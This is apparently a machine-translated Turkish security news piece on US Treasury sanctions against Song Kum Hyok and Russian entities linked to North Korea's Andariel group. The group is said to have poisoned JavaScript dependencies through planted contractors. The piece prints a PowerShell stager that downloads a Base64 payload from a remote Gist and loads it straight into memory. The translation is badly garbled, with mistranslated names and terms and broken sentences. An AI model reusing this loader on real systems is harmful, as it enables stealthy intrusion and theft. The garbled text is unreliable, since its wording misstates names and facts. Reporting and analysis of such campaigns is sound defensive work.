ABD Hazinesi’nin 8 Temmuz Şarkısı Kum Hyok ve dört Rusya merkezli varlık, Pyongyang’ın silah programlarını yıllarca sessizce karşılayan gelişmiş kötü amaçlı özellikli gelir boru hattında perdeyi geri çekti.
Müfettişler kampanyayı, yüksek değerli kripto para birimi soygunları için zaten kötü şöhretli bir keşif genel bürosu (RGB) alt birim olan Andariel’e kadar izliyor.
Kuzey Koreli geliştiricileri meşru yazılım projelerine yerleştirerek, grup kalıcı, kurumsal depolara ve CI/CD boru hatlarına kod imzalayan erişim elde etti ve kötü amaçlı güncellemelerin güvenilir kanallara binmesine izin verdi.
Yerleştirme haftalarında, haydut müteahhitler, derledikten sonra bir PowerShell Stager’ı *.CHINA-CDN ile yan yükleyen zararsız görünümlü bir JavaScript bağımlılığını tohumlamaya başladı.[.]Org, bir içerik aynası olarak görünen bir alan adı.
ABD Hazine Analistleri Departmanı, Stager’ın işaret aralığının trafik şekli taban çizgilerini engelleyerek 90 ila 600 saniye arasında dinamik olarak değiştiğini kaydetti.
Aynı analistler, Mart 2025’ten sonra Github Eylemleri koşucularına ulaşan her yapı işinin değişmiş bağımlılığı içerdiğini tespit ettiler-mızrak avlanmasından ziyade tedarik zincirinin zehirlenmesinin tercih edilen saldırı vektörü olduğunu belirledi.
Mağdurlar üç kıtada fintech, sağlık ve endüstriyel IoT satıcılarını kapsar; Bazı durumlarda, bozuk ikili dosyalar, rutin yama döngülerini etkili bir şekilde silahlandıran güncel güncelleme sunucularına itildi.
Tedavi edilen cihazlar daha sonra AES-256 şifrelemesinden önce LZNT1 ile sıkıştırılmış içeriği sıkıştırarak Andariel’in komut katmanına telemetri, pano verileri ve kripto para birimi cüzdanı dosyalarını huni yaptı. Hazine araştırmacıları, grubun çalınan cüzdanlardan doğrudan para kazandığını, diğer verilerin ise Rus yeraltı pazarlarında satıldığını belirtti.
Bellek yerleşik yükleyicisi
İlk JavaScript implantı sadece “işçi-resume.txt” olarak atıfta bulunulan bir GitHub GIST’de depolanan Base64 kodlu bir blob getirir.
Blob, asla diske dokunmayan dört aşamalı bir PowerShell betiğine genişler, kaldırma Add-Type C# satırını derlemek ve Windows Management Enstrümantasyon Hizmetini kalıcılık için ele geçirmek için.
Yoğunlaştırılmış bir alıntı, önemli bir teslimat gösterir:-
$raw = Invoke-RestMethod $gurl
$bytes = [System.Convert]::FromBase64String($raw)
$decomp = [System.IO.Compression.DeflateStream]::new(
[System.IO.MemoryStream]::new($bytes), 'Decompress')
$buf = New-Object byte[] 0x2000
while(($len = $decomp.Read($buf,0,$buf.Length)) -gt 0){
[System.Reflection.Assembly]::Load($buf[0..($len-1)]) | Out-Null
}
Start-Sleep (Get-Random -Min 90 -Max 600) Her yürütme, şifreli bir .NET yükünü doğrudan belleğe yükler, geleneksel dosya tabanlı antivirüs taramalarını engeller ve sadece değişken eserler bırakır amsi.dll kancalar.
Malign DLL daha sonra altındaki bir etkinlik tüketicisini kaydeder root\\subscriptionYeni Hizmetler veya Kayıt Defteri Çalışma Keyleri oluşturmadan yeniden başlatıldıktan sonra canlanmayı sağlamak-Haziran 2025’e kadar Virustotal başvurularında yüzde 5’in altında konakçı tabanlı algılama oranlarını tutan bir kaçırma taktiği.
Sürekli yaptırım baskısı nakit çıkış caddelerini karmaşıklaştıracak, ancak kampanyanın düşük ayak izi, uzaktan yüklenici iş akışlarının neden devlet destekli kötü amaçlı yazılım operatörleri için çekici, denetlenmesi zor bir kanal olmaya devam ediyor.
Canlı kötü amaçlı yazılım davranışını araştırın, bir saldırının her adımını izleyin ve daha hızlı, daha akıllı güvenlik kararlarını alın -> Herhangi birini deneyin. Şimdi